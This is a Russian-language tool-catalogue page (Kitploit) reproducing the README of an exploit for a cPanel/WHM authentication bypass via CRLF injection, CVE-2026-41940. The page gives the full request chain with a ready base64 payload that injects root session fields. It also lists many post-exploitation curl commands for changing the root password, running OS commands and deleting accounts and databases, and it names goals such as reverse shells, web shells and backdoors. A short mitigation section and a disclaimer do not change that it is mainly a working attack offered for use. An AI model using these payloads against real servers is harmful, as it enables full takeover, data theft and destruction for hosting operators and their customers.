Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — Критический эксплойт обхода аутентификации для cPanel/WHM CVE-2026-41940. Использует CRLF-инъекцию в демоне cpsrvd для получения root-доступа к WHM без учетных данных. Включает определение версии, подробное логирование, поддержку прокси, формирование JSON-отчетов и постэксплуатационное перечисление учетных записей. Только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
225 дней назадЕщё не проверено

Описание

Критический эксплойт обхода аутентификации для cPanel/WHM CVE-2026-41940. Использует CRLF-инъекцию в демоне cpsrvd для получения root-доступа к WHM без учетных данных. Включает определение версии, подробное логирование, поддержку прокси, формирование JSON-отчетов и постэксплуатационное перечисление учетных записей. Только для авторизованного тестирования безопасности.

Поделиться

CVE-2026-41940 - Эксплойт обхода аутентификации cPanel & WHM

PythonLicenseCVECVSSStatus

Критический обход аутентификации через CRLF-инъекцию в демоне cpsrvd cPanel/WHM


📋 Обзор

CVE-2026-41940 — это критическая уязвимость обхода аутентификации в cPanel & WHM, которая позволяет неаутентифицированным удалённым злоумышленникам получить административный доступ уровня root к серверу. Уязвимость присутствует в обработке сессий демона cpsrvd, а именно в Cpanel/Session.pm, где некорректная нейтрализация разделителей строк (CRLF) в cookie whostmgrsession и заголовках Authorization позволяет внедрять параметры сессии.

Оценка CVSSТип эксплойтаВоздействиеВектор атаки
9.8Обход аутентификацииДоступ rootСеть
c

⚡ Ключевые возможности

Этот инструмент эксплойта предоставляет следующие ключевые возможности:

  • 🔓 Обход аутентификации - получение root-доступа к WHM без учётных данных

  • 🛡️ Множественные техники обхода - автоматический перебор различных методов проверки

  • 🌐 Поддержка прокси - маршрутизация трафика через HTTP/HTTPS-прокси

  • 📊 JSON-отчёты - создание подробных отчётов об оценке

  • 📝 Подробное логирование - расширенный режим отладки с метками времени

  • 🔍 Определение версии - автоматическое обнаружение и проверка уязвимых версий

  • 👥 Перечисление учётных записей - вывод всех учётных записей cPanel после эксплуатации

  • 🎯 Несколько конечных точек - перебор различных API-эндпоинтов для проверки


🚨 Детали уязвимости

🔬 Технический анализ

Уязвимость обусловлена двумя основными проблемами:

  1. CRLF-инъекция в хранилище сессий - функция saveSession не очищает символы новой строки (\n) в поле pass перед записью в файл сессии, что позволяет внедрять произвольные параметры сессии.

  2. Условный обход кодирования - когда в cookie сессии отсутствует часть ob (сегмент после запятой), значение pass записывается без кодирования (открытым текстом), что позволяет внедрять CRLF-последовательности.

🎯 Уязвимые версии


📦 Установка

Предварительные требования

root@kitploit:~
# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

Файл зависимостей

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Клонирование репозитория

root@kitploit:~
git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Использование

Базовое использование

root@kitploit:~
python3 exploit.py --target https://target.com:2087

Расширенное использование

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Пример вывода

root@kitploit:~
=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Аргументы командной строки


🔬 Методология эксплуатации

Этап 1: Создание предварительной сессии

Сначала эксплойт получает cookie предварительной сессии, выполняя неудачную попытку входа:

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Ответ:

root@kitploit:~
Set-Cookie: whostmgrsession=base64_encoded_data

Этап 2: CRLF-инъекция

Специально сформированный заголовок Authorization внедряет вредоносные параметры сессии:

root@kitploit:~
GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

Декодированная полезная нагрузка:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Этап 3: Извлечение токена

Сервер отвечает перенаправлением, содержащим токен административной сессии:

root@kitploit:~
Location: /cpsess1234567890/

Этап 4: Проверка доступа

Эксплойт перебирает несколько методов проверки, чтобы подтвердить root-доступ.


🎯 Команды пост-эксплуатации

После успешной эксплуатации используйте следующие команды с полученным токеном:

Информация о сервере

root@kitploit:~
# Get server version
curl -k "https://target.com:2087/cpsess-1234567890/json-api/version?api.version=1"

# Get server information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_info?api.version=1"

# Get hostname
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_hostname?api.version=1"

# Get load average
curl -k "https://target.com:2087/cpsess-1234567890/json-api/loadavg?api.version=1"

# Get CPU usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_cpu_usage?api.version=1"

# Get memory usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_memory_usage?api.version=1"

# Get disk usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_disk_usage?api.version=1"

# Server time
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_time?api.version=1"

# Service status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/service_status?api.version=1"

Управление учётными записями

root@kitploit:~
# List all cPanel accounts
curl -k "https://target.com:2087/cpsess-1234567890/json-api/listaccts?api.version=1"

# List accounts with details
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_list?api.version=1"

# Account summary
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_summary?api.version=1"

# Domain information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/domain_info?api.version=1"

# Email statistics
curl -k "https://target.com:2087/cpsess-1234567890/json-api/email_stats?api.version=1"

# PHP configuration
curl -k "https://target.com:2087/cpsess-1234567890/json-api/php_ini?api.version=1"

Скрипты WHM

root@kitploit:~
# Server status
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/serverstatus"

# System information
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/sysinfo"

# List accounts (alternative )
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/listaccts"

# Show processes
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/showprocs"

# Disk usage
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/diskusage"

Административные действия

root@kitploit:~
# Change user password
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/passwd" \
  -d "user=root&pass=NewP@ss123"

# Create new account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/createacct" \
  -d "username=testuser&domain=test.com&password=TestPass123&plan=default"

# Execute OS commands
curl -k -X POST "https://target.com:2087/cpsess-1234567890/scripts/run_script" \
  -d "script=id"

# Suspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/suspendacct" \
  -d "user=testuser"

# Unsuspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/unsuspendacct" \
  -d "user=testuser"

# Remove account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/removeacct" \
  -d "user=testuser"

Информация о безопасности

root@kitploit:~
# Get security advisor info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/security_advisor?api.version=1"

# Get SSH key info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_ssh_keys?api.version=1"

# Check firewall status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/firewall_status?api.version=1"

# Get SSL certificates
curl -k "https://target.com:2087/cpsess-1234567890/json-api/ssl_certificates?api.version=1"

Операции с базами данных

root@kitploit:~
# List MySQL databases
curl -k "https://target.com:2087/cpsess-1234567890/json-api/databases?api.version=1"

# Create database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/create_db" \
  -d "db=test_db"

# Delete database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/delete_db" \
  -d "db=test_db"

# List database users
curl -k "https://target.com:2087/cpsess-1234567890/json-api/db_users?api.version=1"

🛡️ Возможности после эксплуатации

После получения root-доступа к WHM злоумышленник может:

Управление учётными записями

  • 🔍 Просматривать все учётные записи cPanel

  • 👤 Создавать новые учётные записи cPanel

  • 🔑 Изменять пароли учётных записей

  • ❌ Удалять или приостанавливать учётные записи

Управление сервером

  • 🖥️ Выполнять команды ОС

  • 🔄 Изменять пароль root

  • 📊 Просматривать статистику сервера

  • 🗄️ Управлять базами данных MySQL

Закрепление

  • 🐚 Развёртывать обратные оболочки

  • 🌐 Устанавливать веб-оболочки

  • 🗝️ Устанавливать бэкдоры

  • 🔒 Создавать скрытые административные учётные записи

Доступ к данным

  • 📁 Получать доступ ко всем файлам сервера

  • 💾 Экспортировать базы данных

  • 📧 Читать почтовые учётные записи

  • 🔐 Получать доступ к SSL-сертификатам


🚨 Экстренные меры смягчения последствий

Немедленные действия

root@kitploit:~
# 1. Update cPanel/WHM immediately
/scripts/upcp --force

# 2. Invalidate all active sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

# 3. Restrict WHM access to trusted IPs
# Add to /etc/csf/csf.conf
# Or configure firewall

# 4. Enable Multi-Factor Authentication (MFA )
# WHM > Security Center > Two-Factor Authentication

# 5. Change ALL passwords
# - Root password
# - All cPanel user passwords
# - Database passwords
# - FTP passwords

# 6. Audit system for backdoors
find / -type f -mtime -7 -name "*.php" -o -name "*.pl" -o -name "*.cgi"

# 7. Check for malicious cron jobs
crontab -l
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done

# 8. Check SSH authorized keys
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ==="
  cat /home/$user/.ssh/authorized_keys 2>/dev/null
done

Долгосрочное предотвращение

  • ✅ Внедрить строгую проверку входных данных для предотвращения CRLF-инъекций

  • ✅ Развернуть правила WAF для обнаружения и блокировки вредоносных запросов

  • ✅ Включить ограничения доступа к WHM по IP-адресам

  • ✅ Регулярно обновлять cPanel/WHM до последних версий

  • ✅ Проводить регулярные оценки безопасности

  • ✅ Отслеживать журналы на предмет подозрительной активности

  • ✅ Применять принцип минимальных привилегий

  • ✅ Включить Security Advisor в WHM

  • ✅ Регулярно проводить аудиты безопасности

  • ✅ Внедрить систему обнаружения вторжений


📊 Пример отчёта

root@kitploit:~
{
  "timestamp": "2026-07-26T22:23:25.123456",
  "target": "https://target.com:2087",
  "status": "success",
  "token": "1234567890",
  "detected_version": "11.110.0.85",
  "vulnerable": true,
  "verification_method": "url_format",
  "notes": "Root access confirmed; Token verified",
  "exploit_name": "CVE-2026-41940",
  "cvss_score": "9.8",
  "description": "cPanel/WHM Authentication Bypass via CRLF Injection",
  "exploit_version": "1.0"
}

⚠️ Юридический отказ от ответственности

Этот инструмент предоставляется исключительно в образовательных целях и для этических исследований в области безопасности. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Используя этот инструмент, вы соглашаетесь взять на себя всю ответственность за свои действия. Убедитесь, что у вас есть явное разрешение, прежде чем тестировать любую систему.


🤝 Вклад в проект

Мы приветствуем ваш вклад! Пожалуйста, выполните следующие шаги:

  1. 🍴 Сделайте форк репозитория

  2. 🔧 Создайте ветку для вашей функции (git checkout -b feature/amazing-feature )

  3. 💾 Зафиксируйте свои изменения (git commit -m 'Add amazing feature')

  4. 📤 Отправьте ветку в удалённый репозиторий (git push origin feature/amazing-feature)

  5. 🔃 Откройте Pull Request


📝 Журнал изменений

v1.0.0 (2026-07-26)

  • 🎉 Первоначальный выпуск

  • 🔓 Реализация эксплойта CRLF-инъекции

  • 🛡️ Множественные техники обхода проверки

  • 📊 Генерация JSON-отчётов

  • 🌐 Поддержка прокси

  • 📝 Подробное логирование

  • 🔍 Определение версии

  • 👥 Перечисление учётных записей

  • 📚 Полный набор команд пост-эксплуатации


📧 Контакты

  • Уведомление о безопасности - [email protected]

  • GitHub Issues - Создать Issue


📚 Ссылки

  1. Детали CVE-2026-41940

  2. Уведомление о безопасности cPanel

  3. Исследование watchTowr

  4. Шпаргалка по CRLF-инъекциям

  5. Документация WHM API


⚠️ ПОМНИТЕ: С большой силой приходит большая ответственность! Используйте этично! ⚠️

Сделано с ❤️ для сообщества специалистов по безопасности

Скачать инструмент
АтрибутЗначение
CVE IDCVE-2026-41940
Оценка CVSS9.8 (критическая)
Тип уязвимостиОбход аутентификации через CRLF-инъекцию
Затронутый компонентдемон cpsrvd (Cpanel/Session.pm)
Вектор атакиСеть
ВоздействиеПолный доступ root
ЭксплуатацияУдалённо, без аутентификации
Канал релизаУязвима доИсправленная версия
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5
АргументКороткая формаОбязателенОписание
--target-t✅URL цели (например, https://target.com:2087 )
--verbose-v❌Включить подробный/отладочный вывод
--proxy-p❌URL прокси (например, http://127.0.0.1:8080 )
--output-o❌Выходной файл для JSON-отчёта
--timeout❌Тайм-аут запроса в секундах (по умолчанию: 10)
--list-accounts-l❌Вывести список учётных записей cPanel после успешной эксплуатации
--version❌Показать версию эксплойта